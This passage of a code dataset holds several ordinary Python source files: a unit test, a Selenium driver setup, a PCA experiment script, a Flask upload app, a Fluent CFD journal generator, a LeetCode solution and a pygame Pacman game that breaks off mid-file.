Here\", intention=42)\n assert not r4a\n checkStringify(\"r4a\", r4a, u\"\")\n\n r5 = DataWireResult.fromErrorAndResults(error=None, alpha=\"Alice\", beta=True)\n assert r5\n checkStringify(\"r5\", r5, u\"\")\n\n r6 = DataWireResult.fromErrorAndResults(alpha=\"Alice\", beta=True)\n assert r6\n checkStringify(\"r6\", r6, u\"\")\n\n r7 = DataWireResult.fromJSON(r6.toJSON())\n assert r7\n checkStringify(\"r7\", r7, u\"\")\n\n r8 = DataWireResult.fromErrorAndResults(error=\"Error String Here\")\n assert not r8\n checkStringify(\"r8\", r8, u\"\")\n\n r9 = DataWireResult.fromJSON(r8.toJSON())\n assert not r9\n checkStringify(\"r9\", r9, u\"\")\n\n r8a = DataWireResult.fromErrorAndResults(error=\"Error String for 8a\", thisIs=\"test 8a\", andItIs=\"anError\")\n assert not r8a\n checkStringify(\"r8a\", r8a, u\"\")\n\n r9a = DataWireResult.fromJSON(r8a.toJSON())\n assert not r9a\n checkStringify(\"r9a\", r9a, u\"\")\n\n r10a = DataWireResult.fromJSON('{\"thisIs\": \"test 10\", \"andItIs\": \"anError\", \"ok\": false, \"error\": \"Error String for 10\"}')\n assert not r10a\n checkStringify(\"r10a\", r10a, u\"\")\n\n def test_randomID(self):\n \"\"\"Check out random IDs.\"\"\"\n\n randomness = DataWireRandom()\n\n seen = {}\n\n for i in range(10):\n x = randomness.randomID()\n\n # print(x)\n\n if x in seen:\n assert False\n\n seen[x] = True\n\n assert True\n","repo_name":"datawire/datawire-cli","sub_path":"tests-local/testUtils.py","file_name":"testUtils.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29241954924","text":"ListString = []\ncount = 0\n\n\nfor i in range(5) :\n String = input(\"Please enter a string: \")\n ListString.append(String)\n\nfor i in ListString:\n if(len(i) >= 4 and i[0]==i[len(i)-1]) :\n count += 1\n\nprint(ListString)\nprint(count)","repo_name":"omuu554/PythonProjects2","sub_path":"ListsWork/List18.py","file_name":"List18.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42313291763","text":"# Built-in imports\nfrom platform import system, machine\n\n# Package imports\nfrom selenium import 
webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\n#from pyvirtualdisplay import Display\n\n# Setup Driver\ndef setup_driver(headless=False):\n options = Options()\n\n if (headless):\n headless_opts = [\n \"--headless\",\n \"--disable-gpu\",\n \"--window-size=1920,1200\",\n \"---ignore-certificate-errors\",\n \"--disable-extensions\",\n #\"--no-sandbox\",\n #\"--disable-dev-shm-usage\",\n #\"--remote-debugging-port=9515\",\n #\"--disable-setuid-sandbox\"\n ]\n for opt in headless_opts:\n options.add_argument(opt)\n #print(opt)\n \n # Much thanks to https://stackoverflow.com/a/71042821\n raspberry_pi = system() == \"Linux\" and machine() == \"armv7l\"\n if not raspberry_pi:\n service = Service(ChromeDriverManager().install())\n else:\n #display = Display(visible=0, size=(1920,1200))\n #display.start()\n raspbian_chromium = \"/usr/lib/chromium-browser/chromedriver\"\n service = Service(raspbian_chromium)\n #options.binary_location = raspbian_chromium\n\n return webdriver.Chrome(service=service, options=options)\n\n\n","repo_name":"Denperidge/facebook-event-aggregator","sub_path":"app/scrape_and_parse/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"41032259888","text":"import numpy as np\nfrom Algorithms import Algorithms\nfrom GraphTopology import GraphType\nimport pickle\nimport argparse\nimport read_dataset\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-K\", \"--K\", help=\"number of eigenvectors to be estimated, default number is 5\", type = int, default=5)\nparser.add_argument(\"-n\", \"--num_nodes\", help=\"number of nodes in the network, default number is 10\", type = int, default=10)\nparser.add_argument(\"-s\", \"--stepsize\", help=\"step size (or learning rate) for DSA and centralized GHA algorithms, default value is 0.1\", type = float, default=0.1)\nparser.add_argument(\"-ds\", \"--dataset\", help=\"dataset used for the experiment, default is MNIST\",\n choices=['mnist', 'cifar10'], type = str, default=\"mnist\")\nargs = parser.parse_args()\n\n# initialize variables\niterations = 10000\n\nK = args.K # number of eigenvectors to be estimated\n\ngtype = 'erdos-renyi'\np = 0.5 # connectivity for erdos renyi graph\n\nnum_nodes = args.num_nodes # number of nodes\nstep_size = args.stepsize # initial step size for DSA\nstep_sizeg = args.stepsize # initial step size for GHA\nstep_sizep = 1 # initial step size for PGD\nflag = 0 # flag = 0: constant step size, flag = 1: 1/t^0.2, flag = 2: 1/sqrt(t)\n\n# generate graph\ngraphW = GraphType(gtype, num_nodes, p)\nW = graphW.createGraph()\nWW = np.kron(W, np.identity(K))\n\n# import data set\ndataset = args.dataset\ndata = read_dataset.read_data(dataset)\n\n# load EVD output\nwith open(\"Datasets/true_eigenvectors/EV_{}.pickle\".format(dataset), 'rb') as f:\n X1 = pickle.load(f)\nX_gt = X1[:, 0:K]\n\nnp.random.seed(1)\nX_init = np.random.rand(data.shape[0], K)\nX_init, r = np.linalg.qr(X_init)\n\n\ntest_run = Algorithms(data, iterations, K, num_nodes, initial_est=X_init, ground_truth=X_gt)\n\nangle_sanger = test_run.centralized_sanger(step_size, flag)\nangle_oi = test_run.OI()\nangle_dsa = test_run.DSA(WW, step_size, flag)\nangle_seqdistpm = test_run.seqdistPM(W, 50)\nangle_dpgd = test_run.distProjGD(WW, step_sizep, flag)\n\n\nwith 
open('results/{}_K{}_stepsize{}_stepsizeg{}_stepsizep{}_flag{}_graphtype{}_n{}.pickle'.format(dataset, K, step_size, step_sizeg, step_sizep, flag, gtype, num_nodes), 'wb') as f:\n pickle.dump([angle_dsa, angle_sanger, angle_oi, angle_seqdistpm, angle_dpgd], f)\n","repo_name":"INSPIRE-Lab-US/DSA-Distributed-PCA","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"1412207532","text":"# Flask などの必要なライブラリをインポートする\nimport os\nfrom datetime import datetime\n\nimport werkzeug\nfrom flask import (Flask, jsonify, make_response, redirect, render_template,\n request, url_for, send_from_directory)\n\nimport pandas as pd\nimport numpy as np\nimport settings.messages as msg\nfrom settings.base import *\n\n# 自身の名称を app という名前でインスタンス化する\napp = Flask(__name__)\n# limit upload file size : 1MB\napp.config[\"MAX_CONTENT_LENGTH\"] = 1 * 1024 * 1024\n\n# ここからウェブアプリケーション用のルーティングを記述\n# index にアクセスしたときの処理\n@app.route(\"/\")\ndef index():\n\n # 実際はファイルから取得するリスト\n shohin_list = [\n \"product_1\",\n \"product_2\",\n \"product_3\",\n \"product_4\",\n \"product_5\",\n \"product_6\",\n \"product_7\",\n \"product_8\",\n \"product_9\",\n \"product_10\",\n ]\n\n rank_dict = {\n key_str: zip([rank.lower() for rank in RANK_DICT[key_str]], RANK_DICT[key_str])\n for key_str in RANK_DICT.keys()\n }\n # jinja2の参考にさせていただいた: https://tanuhack.com/jinja2-cheetsheet/\n # index.html をレンダリングする\n return render_template(\"test.html\",\n title=SYSTEM_NAME,\n message=msg.HOWTOUSE,\n rank_dict=rank_dict,\n product_list=shohin_list\n )\n\n# /post にアクセスしたときの処理\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef return_result():\n if request.method == \"POST\":\n # リクエストフォームから「名前」を取得\n name = request.form.get(\"name\")\n # チェックボックスで選択された項目のリストを取得\n checked_list = request.form.getlist(\"chk_rank\")\n # 選択された商品のリストを取得\n selected_shohin_list = request.form.get(\"txt_shohin_selected\")\n\n # アップロードされたファイルを取得\n if not \"upload_files\" in request.files:\n return make_response(jsonify({\"result':'upload_files not exist.\"}))\n \n files = request.files.getlist(\"upload_files\")\n for f in files:\n saveFileName = datetime.now().strftime(\"%Y%m%d_%H%M%S_\") \\\n + werkzeug.utils.secure_filename(f.filename)\n #saveFileName = datetime.now().strftime(\"%Y%m%d_%H%M%S_\")\n f.save(os.path.join(UPLOAD_DIR, saveFileName))\n print(f\"name: {name}\")\n print(f\"checked_list: {checked_list}\")\n print(f\"selected_shohin_list: {selected_shohin_list}\")\n # index.html をレンダリングする\n # 実際は別処理で取得するテーブル\n df = pd.DataFrame(\n {\n \"product\": np.random.choice(selected_shohin_list.split(\",\"), size=20),\n \"rank\": np.random.choice(RANK_DICT.get(\"a\") + RANK_DICT.get(\"b\"), size=20)\n }\n )\n save_file_name = \"{}.csv\".format(datetime.now().strftime(\"%Y%m%d_%H%M%S_%f\"))\n download_file_name = \"result_\" + save_file_name\n df.to_csv(os.path.join(DOWNLOAD_DIR, save_file_name), index=False)\n #return render_template(\"test.html\", name=name)\n #今回はcsvだが、ExcelのMIMETYPE参考ページ:https://qiita.com/5zm/items/760000cf63b176be544c\n return send_from_directory(\n DOWNLOAD_DIR,\n save_file_name,\n as_attachment = True,\n attachment_filename = download_file_name,\n mimetype = \"text/csv\"\n )\n else:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for(\"result\"))\n\n\nif __name__ == \"__main__\":\n app.debug = True # デバッグモード有効\n # hostはデフォルトでループバックアドレスだが、未来の自分が気にしそうなので明示しておく\n # 本番環境では run を使用しないように注意喚起されている(セキュリティ関連)\n # 公式ドキュメント: 
https://flask.palletsprojects.com/en/1.0.x/api/\n #app.run(host=\"127.0.0.1\")\n app.run(host=\"0.0.0.0\")\n","repo_name":"miya8/flask_docker_test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1578686414","text":"import numpy as np\nimport os\nimport fluent_tui\n\n\nwhole_jou = ''\nproject_title = 'C095'\nversion_name = 'V1_bil'\ncad_name = 'C095_V1_bil'\nproject_path = r\"G:\\_HAVC_Project\\C095\\C095_03_bi_level\\C095_V1_bil\"\n\n# valve_dir = [0, -1, 0]\n# valve_origin = [5407.69, 869.38, 1022.1]\n# linearity angle setup\ntotal_angle = 90\nstart_angle = 30\npoints = 7\n\n\nangle_array = np.linspace(start_angle, total_angle, points, endpoint=True) # define your angle range and points\n# angle_array = [round(i, 3) for i in angle_array]\nangle_array = [int(i) for i in angle_array]\n\nprint('angle array:', angle_array)\n\njou_out = project_path\njou_title = project_title + '-' + version_name + '-TUI'\ntxt_name = jou_out + '\\\\' + jou_title + '.jou' # txt final path\nprint('output journal in:', txt_name)\njou = open(txt_name, 'w')\n\nCFD = fluent_tui.tui(whole_jou, project_title, version_name, project_path, cad_name)\n# j = 0\n\n\nfor i in angle_array:\n cad_lin_name = '%s_%s' % (cad_name, i)\n\n # rotate_angle = round(angle_array[j] - angle_array[j - 1], 3)\n # j = j + 1\n CFD.mesh.import_distrib(cad_name=cad_lin_name)\n CFD.mesh.general_improve(0.75)\n CFD.mesh.fix_slivers()\n CFD.mesh.compute_volume_region()\n CFD.mesh.volume_mesh_change_type(dead_zone_list=['valve'])\n # CFD.mesh.auto_mesh_volume(1.25)\n CFD.mesh.auto_mesh_volume(1.25, 'tet')\n CFD.mesh.auto_node_move(0.85, 6)\n CFD.mesh.rename_cell(zone_list=['diffuser', 'distrib', 'evap', 'hc'])\n CFD.mesh.retype_face(face_list=['inlet'], face_type='mass-flow-inlet')\n CFD.mesh.retype_face(face_list=['evap*', 'hc*'], face_type='internal')\n # CFD.mesh.retype_face(face_list=['hc*'], face_type='radiator')\n CFD.mesh.retype_face(face_list=['outlet*'], face_type='outlet-vent')\n CFD.mesh.prepare_for_solve()\n CFD.mesh.write_lin_mesh(i)\n\n\nmass_flux_list = ['inlet*', 'outlet*']\n\nevap_d1 = [-0.98163, 0, -0.19081]\nevap_d2 = [0, 1, 0]\nhc_d1 = [-0.87459, 0, -0.48486]\nhc_d2 = [0, 1, 0]\n\nCFD.mesh.switch_to_solver()\nCFD.setup.replace_lin_mesh(start_angle)\n# CFD.setup.read_lin_mesh(start_angle)\nCFD.setup.rescale()\n# CFD.setup.convert_polymesh()\nCFD.setup.turb_models()\n\nCFD.setup.porous_zone('evap', evap_d1, evap_d2, 1.03e+07, 303.49)\nCFD.setup.porous_zone('hc', hc_d1, hc_d2, 5.18e+07, 816.9)\n# CFD.setup.BC_type('inlet', 'pressure-inlet')\nCFD.setup.BC_type('inlet*()', 'mass-flow-inlet')\nCFD.setup.BC_type('outlet*()', 'outlet-vent')\nCFD.setup.solution_method()\n# CFD.setup.energy_eqt('yes')\n# CFD.setup.BC_pressure_inlet('inlet')\n# CFD.setup.init_temperature('mass-flow-inlet', 'outlet-vent', 273.15)\nCFD.setup.BC_mass_flow_inlet('inlet', 0.0735)\n\nCFD.setup.BC_outlet_vent(10.233, 'outlet_vent')\nCFD.setup.BC_outlet_vent(3.363, 'outlet_foot')\n# CFD.setup.BC_outlet_vent(0, 'outlet_sdl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_sdr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_cdl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_cdr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_ffl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_ffr')\n# CFD.setup.BC_outlet_vent(0, 'outlet_rfl')\n# CFD.setup.BC_outlet_vent(0, 'outlet_rfr')\n\n# CFD.setup.heat_flux('hc_out', 348.15)\n# CFD.setup.heat_flux('hc_in', 348.15)\n# 
CFD.setup.report_definition('temperature', 'surface-areaavg', ['outlet*'], 'yes', 'temperature')\nCFD.setup.report_definition('mass-flux', 'surface-massflowrate', mass_flux_list, 'no')\nCFD.setup.convergence_criterion()\nCFD.setup.hyb_initialize()\nCFD.setup.start_calculate(350)\nCFD.setup.write_lin_case_data(start_angle)\nCFD.post.simple_lin_post(start_angle)\n\nfor i in angle_array[1:]:\n CFD.setup.replace_lin_mesh(i)\n CFD.setup.rescale()\n # CFD.setup.init_temperature('mass-flow-inlet', 'outlet-vent', 273.15)\n CFD.setup.hyb_initialize()\n CFD.setup.start_calculate(350)\n CFD.setup.write_lin_case_data(i)\n CFD.post.simple_lin_post(i)\n # CFD.post.txt_surface_integrals('area-weighted-avg', ['dct*'], 'temperature')\n CFD.post.txt_surface_integrals('volume-flow-rate', ['inlet*', 'outlet*', 'evap*', 'hc*'])\n\njou.write(CFD.whole_jou)\njou.close()\nos.system(txt_name)","repo_name":"qweaxdzsc/fluent_add_on","sub_path":"Python-test/linearity_new.py","file_name":"linearity_new.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"72651777681","text":"'''\nGiven a string, find the first non-repeating character in it and return it's index. If it doesn't exist, return -1.\n\nExamples:\n\ns = \"leetcode\"\nreturn 0.\n\ns = \"loveleetcode\",\nreturn 2.\nNote: You may assume the string contain only lowercase letters.\n'''\n\nclass Solution:\n def firstUniqChar(self, s):\n seen_before=[]\n for i in range(len(s)):\n if s[i] not in s[i+1:] and s[i] not in seen_before:\n return i\n seen_before.append(s[i])\n return -1\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n","repo_name":"dave05/wallbreakers","sub_path":"week2/First Unique Character in a String.py","file_name":"First Unique Character in a String.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42545070230","text":"import pygame\r\nfrom abc import ABCMeta, abstractmethod\r\nimport random\r\nimport time\r\nimport Highscore\r\nimport login\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((800, 600), 0)\r\npygame.display.set_caption(\"Pacman\")\r\nfont = pygame.font.SysFont(\"arial\", 20, True, False)\r\n\r\n\r\nAMARELO = (255, 255, 0)\r\nPRETO = (0, 0, 0)\r\nAZUL = (0, 0, 255)\r\nVERMELHO = (255, 0, 0)\r\nBRANCO = (255, 255, 255)\r\nLARANJA = (255, 140, 0)\r\nROSA = (255, 15, 192)\r\nCIANO = (0, 255, 255)\r\nVELOCIDADE = 1\r\nACIMA = 1\r\nABAIXO = 2\r\nDIREITA = 3\r\nESQUERDA = 4\r\n\r\nnomeUsuario = ''\r\n\r\nglobal matrizMapa\r\nmatrizMapa = [\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n 
[2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 0, 0, 0, 0, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 0, 0, 0, 0, 0, 0, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2]\r\n ]\r\n\r\n\r\nclass ElementoJogo(metaclass=ABCMeta):\r\n @abstractmethod\r\n def pintar(self, tela):\r\n pass\r\n\r\n @abstractmethod\r\n def calcular_regras(self):\r\n pass\r\n\r\n @abstractmethod\r\n def processar_eventos(self, eventos):\r\n pass\r\n\r\n\r\nclass Movivel(metaclass=ABCMeta):\r\n @abstractmethod\r\n def aceitar_movimento(self):\r\n pass\r\n\r\n @abstractmethod\r\n def recusar_movimento(self, direcoes):\r\n pass\r\n\r\n @abstractmethod\r\n def esquina(self, direcoes):\r\n pass\r\n\r\n\r\nclass Cenario(ElementoJogo):\r\n def __init__(self, tamanho, pac):\r\n self.pacman = pac\r\n self.moviveis = []\r\n self.pontos = 0\r\n # Estados possiveis 0-Jogando 1-Pausado 2-GameOver 3-Vitoria\r\n self.estado = 0\r\n self.tamanho = tamanho\r\n self.vidas = 5\r\n self.matriz = matrizMapa\r\n\r\n def adicionar_movivel(self, obj):\r\n self.moviveis.append(obj)\r\n\r\n def pintar_score(self, tela):\r\n pontos_x = self.tamanho * 30\r\n pontos_img = font.render(\"Score {}\".format(self.pontos), True, AMARELO)\r\n vidas_img = font.render(\"Vidas {}\".format(self.vidas), True, AMARELO)\r\n highscore_img = font.render(\"Highscore\", True, AMARELO)\r\n listaTop10 = []\r\n cont = 0\r\n for score in Highscore.top10(\"Pacman\"):\r\n tela.blit(font.render(score[0] + \" \" + score[1] + \" \" + score[2], True, AMARELO), (pontos_x, 150 + 25 * cont))\r\n cont += 1\r\n\r\n scoreUsuario = Highscore.buscaScore(\"Pacman\", nomeUsuario)\r\n if scoreUsuario != []:\r\n tela.blit(font.render(scoreUsuario[0] + \" \" + scoreUsuario[1] + \" \" + scoreUsuario[2], True, AMARELO), (pontos_x, 430))\r\n tela.blit(highscore_img, (pontos_x, 120))\r\n tela.blit(pontos_img, (pontos_x, 50))\r\n tela.blit(vidas_img, (pontos_x, 74))\r\n\r\n def pintar_linha(self, tela, numero_linha, linha):\r\n for numero_coluna, coluna in enumerate(linha):\r\n x = 
numero_coluna * self.tamanho\r\n y = numero_linha * self.tamanho\r\n half = self.tamanho // 2\r\n cor = PRETO\r\n if coluna == 2:\r\n cor = AZUL\r\n pygame.draw.rect(tela, cor, (x, y, self.tamanho, self.tamanho), 0)\r\n if coluna == 1:\r\n pygame.draw.circle(tela, AMARELO, (x + half, y + half),\r\n self.tamanho // 10, 0)\r\n\r\n def pintar(self, tela):\r\n if self.estado == 0:\r\n self.pintar_jogando(tela)\r\n elif self.estado == 1:\r\n self.pintar_jogando(tela)\r\n self.pintar_pausado(tela)\r\n elif self.estado == 2:\r\n self.pintar_jogando(tela)\r\n self.pintar_gameover(tela)\r\n elif self.estado == 3:\r\n self.pintar_jogando(tela)\r\n self.pintar_vitoria(tela)\r\n\r\n def pintar_texto_centro(self, tela, texto):\r\n texto_img = font.render(texto, True, AMARELO)\r\n texto_x = (tela.get_width() - texto_img.get_width()) // 2\r\n texto_y = (tela.get_height() - texto_img.get_height()) // 2\r\n tela.blit(texto_img, (texto_x, texto_y))\r\n\r\n def pintar_vitoria(self, tela):\r\n self.pintar_texto_centro(tela, \"P A R A B E N S V O C E V E N C E U ! ! !\")\r\n\r\n def pintar_gameover(self, tela):\r\n self.pintar_texto_centro(tela, \"G A M E O V E R\")\r\n\r\n def pintar_pausado(self, tela):\r\n self.pintar_texto_centro(tela, \"P A U S A D Os\")\r\n\r\n def pintar_jogando(self, tela):\r\n for numero_linha, linha in enumerate(self.matriz):\r\n self.pintar_linha(tela, numero_linha, linha)\r\n self.pintar_score(tela)\r\n\r\n def get_direcoes(self, linha, coluna):\r\n direcoes = []\r\n if self.matriz[int(linha - 1)][int(coluna)] != 2:\r\n direcoes.append(ACIMA)\r\n if self.matriz[int(linha + 1)][int(coluna)] != 2:\r\n direcoes.append(ABAIXO)\r\n if self.matriz[int(linha)][int(coluna - 1)] != 2:\r\n direcoes.append(ESQUERDA)\r\n if self.matriz[int(linha)][int(coluna + 1)] != 2:\r\n direcoes.append(DIREITA)\r\n return direcoes\r\n\r\n def calcular_regras(self):\r\n if self.estado == 0:\r\n self.calcular_regras_jogando()\r\n elif self.estado == 1:\r\n self.calcular_regras_pausado()\r\n elif self.estado == 2:\r\n self.calcular_regras_gameover()\r\n\r\n def calcular_regras_gameover(self):\r\n pass\r\n\r\n def calcular_regras_pausado(self):\r\n pass\r\n\r\n def calcular_regras_jogando(self):\r\n for movivel in self.moviveis:\r\n lin = int(movivel.linha)\r\n col = int(movivel.coluna)\r\n lin_intencao = int(movivel.linha_intencao)\r\n col_intencao = int(movivel.coluna_intencao)\r\n direcoes = self.get_direcoes(lin, col)\r\n if len(direcoes) >= 3:\r\n movivel.esquina(direcoes)\r\n if isinstance(movivel, Fantasma) and movivel.linha == self.pacman.linha and \\\r\n movivel.coluna == self.pacman.coluna:\r\n self.vidas -= 1\r\n if self.vidas <= 0:\r\n Highscore.insereScore(\"Pacman\", nomeUsuario, str(self.pontos))\r\n self.estado = 2\r\n else:\r\n self.pacman.linha = 1\r\n self.pacman.coluna = 1\r\n else:\r\n if 0 <= col_intencao < 28 and 0 <= lin_intencao < 29 and \\\r\n self.matriz[lin_intencao][col_intencao] != 2:\r\n movivel.aceitar_movimento()\r\n if isinstance(movivel, Pacman) and self.matriz[lin][col] == 1:\r\n self.pontos += 1\r\n self.matriz[lin][col] = 0\r\n if self.pontos >= 306:\r\n Highscore.insereScore(\"Pacman\", nomeUsuario, str(self.pontos + 100 * self.vidas))\r\n self.estado = 3\r\n else:\r\n movivel.recusar_movimento(direcoes)\r\n\r\n def processar_eventos(self, evts):\r\n for e in evts:\r\n if e.type == pygame.QUIT:\r\n exit()\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_p:\r\n if self.estado == 0:\r\n self.estado = 1\r\n elif self.estado == 1:\r\n self.estado = 0\r\n elif 
self.estado == 2 or self.estado == 3:\r\n \r\n self.pacman.linha = 1\r\n self.pacman.coluna = 1\r\n self.vidas = 5\r\n self.pontos = 0\r\n self.estado = 0\r\n self.matriz = [\r\n [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 1, 2],\r\n [2, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2, 2, 2, 1, 2, 2, 1, 2, 2, 2],\r\n [2, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 2],\r\n 